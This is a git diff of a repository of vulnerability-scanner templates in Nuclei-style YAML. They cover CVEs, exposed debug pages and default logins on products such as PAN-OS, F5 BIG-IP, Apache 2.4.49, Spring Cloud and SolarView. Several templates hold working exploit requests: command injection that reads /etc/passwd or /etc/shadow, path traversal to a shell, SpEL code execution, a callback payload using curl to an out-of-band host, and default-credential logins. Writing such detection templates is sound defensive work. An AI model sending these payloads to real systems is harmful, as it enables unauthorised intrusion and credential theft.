b/poc/cve/CVE-2024-5550.yaml @@ -1,31 +1,31 @@ -id: CVE-2024-5550 - -info: - name: H2O(v3.40.0.4) arbitrary path lookup - author: VulnSphere - severity: medium - description: H2O allows for arbitrary path lookup via it's Typehead API endpoint - reference: - - https://huntr.com/bounties/e76372c2-39be-4984-a7c8-7048a75a25dc/ - classification: - cwe-id: CWE-200 - tags: h2o-3,h2o,ml,huntr,protectai - -http: - - raw: - - | - GET /3/Typeahead/files?src=%2F&limit=10 HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "/bin" - - "/boot" +id: CVE-2024-5550 + +info: + name: H2O(v3.40.0.4) arbitrary path lookup + author: VulnSphere + severity: medium + description: H2O allows for arbitrary path lookup via it's Typehead API endpoint + reference: + - https://huntr.com/bounties/e76372c2-39be-4984-a7c8-7048a75a25dc/ + classification: + cwe-id: CWE-200 + tags: h2o-3,h2o,ml,huntr,protectai + +http: + - raw: + - | + GET /3/Typeahead/files?src=%2F&limit=10 HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "/bin" + - "/boot" - "/sbin" \ No newline at end of file diff --git a/poc/cve/cve-2020-8115.yaml b/poc/cve/cve-2020-8115.yaml index aecdd7b672..b404c7d217 100644 --- a/poc/cve/cve-2020-8115.yaml +++ b/poc/cve/cve-2020-8115.yaml @@ -1,20 +1,9 @@ -id: CVE-2020-8115 +id: cve-2020-8115 info: name: Revive Adserver XSS - author: madrobot,dwisiswant0 + author: madrobot & dwisiswant0 severity: medium - description: | - A reflected XSS vulnerability has been discovered in the publicly accessible afr.php delivery script of Revive Adserver <= 5.0.3 by Jacopo Tediosi. There are currently no known exploits: the session identifier cannot be accessed as it is stored in an http-only cookie as of v3.2.2. On older versions, however, under specific circumstances, it could be possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script was printed back without proper escaping in a JavaScript context, allowing an attacker to execute arbitrary JS code on the browser of the victim. - reference: - - https://hackerone.com/reports/775693 - - https://www.revive-adserver.com/security/revive-sa-2020-001/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-8115 - cwe-id: CWE-79 - tags: cve,cve2020,xss requests: - method: GET diff --git a/poc/cve/cve-2021-44152.yaml b/poc/cve/cve-2021-44152.yaml index 65f8cd6545..53cfd2061f 100644 --- a/poc/cve/cve-2021-44152.yaml +++ b/poc/cve/cve-2021-44152.yaml @@ -1,20 +1,25 @@ -id: unauth-rlm +id: CVE-2021-44152 info: name: Reprise License Manager 14.2 - Authentication Bypass author: Akincibor severity: critical - description: Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user. + description: | + Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-44152 - https://reprisesoftware.com/admin/rlm-admin-download.php?&euagree=yes - http://packetstormsecurity.com/files/165186/Reprise-License-Manager-14.2-Unauthenticated-Password-Change.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-44152 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-44152 cwe-id: CWE-287 - tags: unauth,rlm + metadata: + verified: true + shodan-query: http.html:"Reprise License Manager" + google-dork: inurl:"/goforms/menu" + tags: cve2021,rlm,auth-bypass,packetstorm,cve requests: - method: GET @@ -23,13 +28,13 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: - "RLM Administration Commands" + - type: status + status: + - 200 + # Enhanced by mp on 2022/06/03 diff --git a/poc/cve/cve-2022-29303.yaml b/poc/cve/cve-2022-29303.yaml index 3f9b0f07ff..1d2c392e54 100644 --- a/poc/cve/cve-2022-29303.yaml +++ b/poc/cve/cve-2022-29303.yaml @@ -6,35 +6,24 @@ info: severity: critical description: | SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system. - remediation: | - Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00. reference: - https://www.exploit-db.com/exploits/50940 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303 - https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing - - http://packetstormsecurity.com/files/167183/SolarView-Compact-6.0-Command-Injection.html - - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-29303 - cwe-id: CWE-78 - epss-score: 0.9598 - epss-percentile: 0.99429 - cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* + cwe-id: CWE-77 metadata: - verified: true - max-request: 1 - vendor: contec - product: sv-cpt-mc310_firmware shodan-query: http.html:"SolarView Compact" - tags: cve,cve2022,injection,solarview,edb,packetstorm,rce,kev,contec + verified: "true" + tags: cve,cve2022,rce,injection,solarview,edb + variables: cmd: "cat${IFS}/etc/passwd" -http: +requests: - raw: - | @timeout: 25s @@ -44,15 +33,10 @@ http: mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M - matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0" - - type: word - part: body - words: - - "p1_network_mail.cgi" -# digest: 4a0a00473045022100cfdae160b8d20debb49ab77a03efc5984e3595e0738b0153de27449eb8cf254c022008bf10a1ac0f9b524841d022daae36b4b0b105ddae1296e300fb87c886200617:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# Enhanced by mp on 2022/06/01 diff --git a/poc/cve/cve-2024-3400.yaml b/poc/cve/cve-2024-3400.yaml index cb640767ec..a9d651ea8b 100644 --- a/poc/cve/cve-2024-3400.yaml +++ b/poc/cve/cve-2024-3400.yaml @@ -1,65 +1,60 @@ -id: cve-2024-3400 +id: CVE-2024-3400 info: - name: Palo Alto GlobalProtect Command Injection - author: hexa - severity: high - description: Detects command injection vulnerability CVE-2024-3400 in Palo Alto GlobalProtect VPN. + name: GlobalProtect - OS Command Injection + author: salts,parthmalhotra + severity: critical + description: | + A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability. + reference: + - https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/ + - https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis + - https://nvd.nist.gov/vuln/detail/CVE-2024-3400 + - https://github.com/zam89/CVE-2024-3400-pot + - https://github.com/ZephrFish/CVE-2024-3400-Canary + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2024-3400 + cwe-id: CWE-20,CWE-77 + epss-score: 0.95703 + epss-percentile: 0.99417 + cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:-:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: paloaltonetworks + product: "pan-os" + shodan-query: + - "http.favicon.hash:-631559155" + - http.favicon.hash:"-631559155" + - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" + fofa-query: "icon_hash=\"-631559155\"" + tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev,intrusive,paloaltonetworks -requests: - - method: POST - path: - - "{{BaseURL}}/ssl-vpn/hipreport.esp" - headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" - Content-Type: "application/x-www-form-urlencoded" - Cookie: "SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{{Filename}}" - matchers: - - type: status - status: - - 200 - extractors: - - type: regex - name: file_content - regex: - - ".*" - payloads: - filename: - - "exploitCheck.exp" +http: + - raw: + - | + GET /global-protect/portal/images/{{randstr}}.txt HTTP/1.1 HTTP/1.1 + Host: {{Hostname}} + - | + POST /ssl-vpn/hipreport.esp HTTP/1.1 + Host: {{Hostname}} + Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{{randstr}}.txt; + Content-Type: application/x-www-form-urlencoded - - method: GET - path: - - "{{BaseURL}}/global-protect/portal/images/{{Filename}}" - headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" - matchers: - - type: status - status: - - 403 - extractors: - - type: regex - name: vuln_check - regex: - - "403" + user=global&portal=global&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=global&computer=global&client-ip=global&client-ipv6=global&md5-sum=global&gwHipReportCheck=global + - | + GET /global-protect/portal/images/{{randstr}}.txt HTTP/1.1 HTTP/1.1 + Host: {{Hostname}} + + # Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}{{interactsh-url}}`; payload for rce, requires cronjob to be executed to run command - - method: POST - path: - - "{{BaseURL}}/ssl-vpn/hipreport.esp" - headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" - Content-Type: "application/x-www-form-urlencoded" - Cookie: "SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{{CallbackURL}}?r=$({{Payload}})`" + matchers-condition: and matchers: - - type: word - words: - - "Success" - payloads: - payload: - - "whoami" - - "id" - - "pwd" - extractors: - - type: regex - name: cmd_exec - regex: - - "Success" + - type: dsl + dsl: + - status_code_1 == 404 && status_code_3 == 403 + - contains(body_2, 'invalid required input parameters') + condition: and +# digest: 4a0a00473045022100aea1f0b3bf8fcbf9b028775de7eee9c1f158aad09cea1518a4ac483b00268ffd02205db7564fb596e8ada469884d750e9125102b47ee3826d62a03e40fbd09bf9ea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/exploit-cve-2022-1388.yaml b/poc/cve/exploit-cve-2022-1388.yaml index 62a06938bc..fb5afb9aac 100644 --- a/poc/cve/exploit-cve-2022-1388.yaml +++ b/poc/cve/exploit-cve-2022-1388.yaml @@ -1,57 +1,37 @@ +--- id: CVE-2022-1388 info: - name: F5 BIG-IP iControl REST Auth Bypass RCE | Command Parameter - author: Mrcl0wn - severity: critical - description: "CVE-2022-1388 is an authentication bypass vulnerability in the REST \ncomponent of BIG-IP’s iControl API that was assigned a CVSSv3 \nscore of 9.8. The iControl REST API is used for the management and \nconfiguration of BIG-IP devices. CVE-2022-1388 could be exploited \nby an unauthenticated attacker with network access to the management \nport or self IP addresses of devices that use BIG-IP. Exploitation would \nallow the attacker to execute arbitrary system commands, create and \ndelete files and disable services.\n" - reference: - - https://github.com/alt3kx/CVE-2022-1388_PoC - - https://support.f5.com/csp/article/K23605346 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388 - - https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md - - https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py - - https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ip - - https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.yaml - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2022-1388 - cwe-id: CWE-306 - metadata: - shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" - verified: true - tags: bigip,mirai,rce,cve,cve2022 -variables: - auth_var: "admin:" - cmd_var: "{{CMD}}" + name: bigip + author: secthebit + severity: critical + requests: + - raw: - | POST /mgmt/tm/util/bash HTTP/1.1 + User-Agent: Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1 Host: {{Hostname}} - Connection: keep-alive, X-F5-Auth-Token - X-F5-Auth-Token: a - Authorization: Basic {{base64(auth_var)}} - Content-Type: application/json + X-F5-Auth-Token: anything + Authorization: Basic YWRtaW46 + Accept: */* + Content-type: application/json + Connection: close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host + + {"command":"run", "utilCmdArgs": "-c 'cat /etc/shadow'"} + + - | - { - "command": "run", - "utilCmdArgs": "-c 'id;cmd_var'" - } + matchers: + - type : regex + part: body + regex: + - "root:.*" + + + extractors: - - type: regex + - type : regex part: body - name: result_command - group: 1 regex: - - "\"commandResult\":\"(.*)\"" - matchers: - - type: word - words: - - "commandResult" - - "uid=" - - "{{cmd_var}}" - - type: status - status: - - 200 - condition: and + - 'root:\$\d+\$\w+' diff --git a/poc/cve/rce-cve-2021-41773.yaml b/poc/cve/rce-cve-2021-41773.yaml index 87e89bc5e2..f8fd2f8e57 100644 --- a/poc/cve/rce-cve-2021-41773.yaml +++ b/poc/cve/rce-cve-2021-41773.yaml @@ -1,51 +1,16 @@ id: CVE-2021-41773 - info: - name: Apache 2.4.49 - Path Traversal and Remote Code Execution - author: daffainfo - severity: high - description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. - reference: - - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 - - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773 - - https://twitter.com/ptswarm/status/1445376079548624899 - - https://twitter.com/h4x0r_dz/status/1445401960371429381 - - https://github.com/blasty/CVE-2021-41773 - remediation: Update to Apache HTTP Server 2.4.50 or later. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-41773 - cwe-id: CWE-22 - metadata: - shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49 - tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,cisa - + name: RCE in Apache HTTP Server 2.4.49 + author: RafaelCaria + severity: critical + tags: cve,cve2021,rce requests: - - raw: - - | - GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 - Host: {{Hostname}} - - - | - POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev - - matchers-condition: or + - method: POST + path: + - '{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' + body: 'echo;id' matchers: - - type: regex - name: LFI + part: body regex: - - "root:.*:0:0:" - - - type: word - name: RCE - words: - - "CVE-2021-41773-POC" - -# Enhanced by mp on 2022/02/27 + - "(uid|gid|groups)=\\d+|bytes from \b(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\b" diff --git a/poc/cve/springForShell-CVE-2022-22963.yaml b/poc/cve/springForShell-CVE-2022-22963.yaml index f28360d6a7..0df514805b 100644 --- a/poc/cve/springForShell-CVE-2022-22963.yaml +++ b/poc/cve/springForShell-CVE-2022-22963.yaml @@ -1,44 +1,49 @@ id: CVE-2022-22963 info: - name: CVE-2022-22963 - Spring Cloud RCE - author: rdnt + name: Spring Cloud - Remote Code Execution + author: Mr-xn,Adam Crosser severity: critical - description: RCE on Spring cloud function SPEL - tags: cve,rce,spring,cve2022,injection + description: | + Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. + reference: + - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f + - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE + - https://tanzu.vmware.com/security/cve-2022-22963 + - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/ + - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection + - https://nvd.nist.gov/vuln/detail/CVE-2022-22963 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22963 - cwe-id: CWE-770 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22963 + cwe-id: CWE-94 + epss-score: 0.97501 + tags: vulhub,cve,cve2022,springcloud,rce,kev + metadata: + max-request: 1 -requests: - - method: POST - path: - - "{{RootURL}}/functionRouter" - - "{{RootURL}}/api/functionRouter" - - "{{RootURL}}/api/v1/functionRouter" - - "{{RootURL}}/../../../../../../functionRouter" - - "{{RootURL}}/../../../../../../;functionRouter" - - "{{RootURL}}/spring/functionRouter" - - "{{RootURL}}/admin/functionRouter" - - "{{RootURL}}/../../../../../../../../functionRouter" - - "{{RootURL}}../../../../../../../../api/functionRouter" - - "{{RootURL}}../../../../../../../../api/v1/functionRouter" - - "{{RootURL}}%2f%2e%2e%2f%2e%2e%2ffunctionRouter" - - "{{RootURL}}%2fspring%2ffunctionRouter" - - "{{RootURL}}%2fadmin%2functionRouter" - headers: - spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("") - Content-Type: application/x-www-form-urlencoded - body: exp +http: + - raw: + - | + POST /functionRouter HTTP/1.1 + Host: {{Hostname}} + spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}") + Content-Type: application/x-www-form-urlencoded + + {{rand_base(8)}} matchers-condition: and matchers: - - type: word - part: body - words: - - 'functionRouter' - - type: status - status: - - 500 \ No newline at end of file + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" + condition: or + + - type: status + status: + - 500 + +# Enhanced by mp on 2022/05/19 diff --git a/poc/debug/coldfusion-debug-xss.yaml b/poc/debug/coldfusion-debug-xss.yaml index aedbabe04b..8031a8dd4a 100644 --- a/poc/debug/coldfusion-debug-xss.yaml +++ b/poc/debug/coldfusion-debug-xss.yaml @@ -4,7 +4,10 @@ info: author: dhiyaneshDK severity: medium description: The remote Adobe ColdFusion debug page has been left open to unauthenticated users, this could allow remote attackers to trigger a reflected cross site scripting against the visitors of the site. - reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml + reference: + - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml + metadata: + shodan-query: http.component:"Adobe ColdFusion" tags: adobe,coldfusion,xss requests: - method: GET diff --git a/poc/debug/laravel-debug-enabled-8574.yaml b/poc/debug/laravel-debug-enabled-8574.yaml index d9a0151104..3613dbd615 100644 --- a/poc/debug/laravel-debug-enabled-8574.yaml +++ b/poc/debug/laravel-debug-enabled-8574.yaml @@ -1,29 +1,19 @@ id: laravel-debug-enabled - info: name: Laravel Debug Enabled author: notsoevilweasel + description: Laravel with APP_DEBUG set to true prone to showing verbose errors. severity: medium - description: | - Laravel with APP_DEBUG set to true is prone to show verbose errors. - remediation: | - Disable Laravel's debug mode by setting APP_DEBUG to false. tags: debug,laravel,misconfig - metadata: - max-request: 1 - -http: +requests: - method: GET path: - "{{BaseURL}}/_ignition/health-check" - matchers-condition: and matchers: - type: word - part: body words: - can_execute_commands - - type: status status: - 200 diff --git a/poc/debug/pyramid-debug-toolbar.yaml b/poc/debug/pyramid-debug-toolbar.yaml index 9a8a0cce4a..c331cd99e1 100644 --- a/poc/debug/pyramid-debug-toolbar.yaml +++ b/poc/debug/pyramid-debug-toolbar.yaml @@ -6,12 +6,10 @@ info: reference: https://github.com/Pylons/pyramid_debugtoolbar severity: medium tags: pyramid,logs,exposure - requests: - method: GET path: - "{{BaseURL}}/_debug_toolbar/" - matchers-condition: and matchers: - type: word @@ -19,7 +17,6 @@ requests: - "Pyramid Debug Toolbar" - "Pyramid DebugToolbar" condition: and - - type: status status: - 200 diff --git a/poc/debug/wamp-xdebug-detect.yaml b/poc/debug/wamp-xdebug-detect.yaml index a0cff18d8e..c9dc3a07bb 100644 --- a/poc/debug/wamp-xdebug-detect.yaml +++ b/poc/debug/wamp-xdebug-detect.yaml @@ -1,17 +1,14 @@ id: wamp-xdebug-detect - info: name: WAMP xdebug author: e_schultze_ severity: info - # Inspired on https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py - # Goal: detect if xdebug.remote_connect_back is enabled - + reference: https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py + tags: debug,config requests: - method: GET path: - "{{BaseURL}}/?phpinfo=-1" - matchers: - type: word words: diff --git a/poc/debug/werkzeug-debugger-detect-11197.yaml b/poc/debug/werkzeug-debugger-detect-11197.yaml index fe448bbca2..aa90f4c1a3 100644 --- a/poc/debug/werkzeug-debugger-detect-11197.yaml +++ b/poc/debug/werkzeug-debugger-detect-11197.yaml @@ -4,19 +4,14 @@ info: name: Werkzeug debugger console author: pdteam severity: info - metadata: - max-request: 1 tags: tech,werkzeug -http: +requests: - method: GET path: - "{{BaseURL}}/console" - matchers: - type: word words: - "

Interactive Console

" part: body - -# digest: 4a0a00473045022013ddd4960a4aea793abed2a46e4120c2dd2122fd149ec908a73cee9671ad065c022100cf561fa7d30e0f52d52a4b79c30869367c884abf9b90d158eaece619373644f4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/debug/wordpress-debug-log-11258.yaml b/poc/debug/wordpress-debug-log-11258.yaml index dee5e0d057..25e5e05c1e 100644 --- a/poc/debug/wordpress-debug-log-11258.yaml +++ b/poc/debug/wordpress-debug-log-11258.yaml @@ -1,9 +1,11 @@ id: wp-debug-log + info: name: WordPress debug log author: geraldino2 & @dwisiswant0 severity: low tags: wordpress,log + requests: - method: GET path: @@ -22,4 +24,4 @@ requests: part: body - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/default/activemq-default-login-47.yaml b/poc/default/activemq-default-login-47.yaml index a4dea884a5..ae5ac0f72c 100644 --- a/poc/default/activemq-default-login-47.yaml +++ b/poc/default/activemq-default-login-47.yaml @@ -1,18 +1,18 @@ id: activemq-default-login - info: name: Apache ActiveMQ Default Login author: pdteam severity: medium + description: Apache ActiveMQ default login information was discovered. + reference: + - https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html tags: apache,activemq,default-login - requests: - raw: - | GET /admin/ HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} - payloads: username: - user @@ -26,4 +26,6 @@ requests: words: - 'Welcome to the Apache ActiveMQ Console of ' - '

Broker

' - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/07 diff --git a/poc/default/aem-default-get-servlet-139.yaml b/poc/default/aem-default-get-servlet-139.yaml index 274b345439..7186c2256f 100644 --- a/poc/default/aem-default-get-servlet-139.yaml +++ b/poc/default/aem-default-get-servlet-139.yaml @@ -1,26 +1,15 @@ id: aem-default-get-servlet - info: - name: AEM DefaultGetServlet author: DhiyaneshDk + name: AEM DefaultGetServlet severity: low - description: Sensitive information might be exposed via AEM DefaultGetServlet. - reference: - - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43 - - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/GetServletExposed.java - tags: aem,adobe + reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43 + tags: aem + requests: - method: GET path: - - '{{BaseURL}}/etc' - - '{{BaseURL}}/var' - - '{{BaseURL}}/apps' - - '{{BaseURL}}/home' - - '{{BaseURL}}///etc' - - '{{BaseURL}}///var' - - '{{BaseURL}}///apps' - - '{{BaseURL}}///home' - '{{BaseURL}}/.json' - '{{BaseURL}}/.1.json' - '{{BaseURL}}/....4.2.1....json' diff --git a/poc/default/ambari-default-login.yaml b/poc/default/ambari-default-login.yaml index e251839b56..75b4ec03c1 100644 --- a/poc/default/ambari-default-login.yaml +++ b/poc/default/ambari-default-login.yaml @@ -1,11 +1,16 @@ id: ambari-default-login - info: name: Apache Ambari Default Login author: pdteam - severity: medium + description: An Apache Ambari default admin login was discovered. + severity: high + reference: + - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: ambari,default-login,apache - requests: - raw: - | @@ -24,3 +29,5 @@ requests: - '"Users" : {' - 'AMBARI.' condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/poc/default/apisix-default-login-490.yaml b/poc/default/apisix-default-login-490.yaml index c16b0c60b1..d89104b847 100644 --- a/poc/default/apisix-default-login-490.yaml +++ b/poc/default/apisix-default-login-490.yaml @@ -1,13 +1,22 @@ id: apisix-default-login + info: - name: Apache Apisix Default Login + name: Apache Apisix Default Admin Login author: pdteam - severity: critical - tags: apisix,apache,default-login + severity: high + description: An Apache Apisix default admin login was discovered. + reference: + - https://apisix.apache.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: shodan-query: title:"Apache APISIX Dashboard" fofa-query: title="Apache APISIX Dashboard" product: https://apisix.apache.org + tags: apisix,apache,default-login + requests: - raw: - | @@ -18,20 +27,25 @@ requests: Content-Type: application/json;charset=UTF-8 {"username":"{{user}}","password":"{{pass}}"} + attack: pitchfork payloads: user: - admin pass: - admin + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - '"data"' - '"token"' - '"code":0' condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/poc/default/apollo-default-login.yaml b/poc/default/apollo-default-login.yaml index 696e2a1121..c9e119d097 100644 --- a/poc/default/apollo-default-login.yaml +++ b/poc/default/apollo-default-login.yaml @@ -1,18 +1,20 @@ id: apollo-default-login + info: name: Apollo Default Login author: PaperPen severity: high description: An Apollo default login was discovered. - metadata: - shodan-query: http.favicon.hash:11794165 reference: - https://github.com/apolloconfig/apollo classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + metadata: + shodan-query: http.favicon.hash:11794165 tags: apollo,default-login + requests: - raw: - | @@ -23,15 +25,18 @@ requests: Referer: {{BaseURL}}/signin? username={{user}}&password={{pass}}&login-submit=Login + - | GET /user HTTP/1.1 Host: {{Hostname}} + attack: pitchfork payloads: user: - apollo pass: - admin + cookie-reuse: true req-condition: true matchers-condition: and @@ -42,6 +47,7 @@ requests: - '"userId":' - '"email":' condition: or + - type: dsl dsl: - "status_code_1 == 302 && status_code_2 == 200" diff --git a/poc/default/arl-default-login-539.yaml b/poc/default/arl-default-login-539.yaml index 50f4ac4d1c..0b8d67077d 100644 --- a/poc/default/arl-default-login-539.yaml +++ b/poc/default/arl-default-login-539.yaml @@ -1,13 +1,8 @@ id: arl-default-login info: - name: ARL Default Admin Login + name: ARL Default Login author: pikpikcu - description: An ARL default admin login was discovered. severity: high - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: arl,default-login requests: - raw: @@ -34,5 +29,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/22 diff --git a/poc/default/azkaban-default-login-674.yaml b/poc/default/azkaban-default-login-674.yaml index 5e705ae10d..5d9e13ca58 100644 --- a/poc/default/azkaban-default-login-674.yaml +++ b/poc/default/azkaban-default-login-674.yaml @@ -1,47 +1,47 @@ -id: azkaban-default-login -info: - name: Azkaban Web Client Default Credential - author: pussycat0x - severity: high - description: Azkaban is a batch workflow job scheduler created at LinkedIn to run Hadoop jobs. Default web client credentials were discovered. - reference: - - https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22 - tags: default-login,azkaban - classification: - cwe-id: CWE-798 -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - action=login&username={{username}}&password={{password}} - payloads: - username: - - admin - password: - - admin - attack: pitchfork - matchers-condition: and - matchers: - - type: word - words: - - '"session.id"' - - '"success"' - condition: and - - type: word - words: - - 'azkaban.browser.session.id' - - 'application/json' - condition: and - part: header - - type: status - status: - - 200 - extractors: - - type: kval - kval: - - azkaban.browser.session.id - -# Enhanced by mp on 2022/03/03 +id: azkaban-default-login + +info: + name: Azkaban Web Client Default Credential + author: pussycat0x + severity: high + reference: https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22 + tags: default-login,azkaban + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} 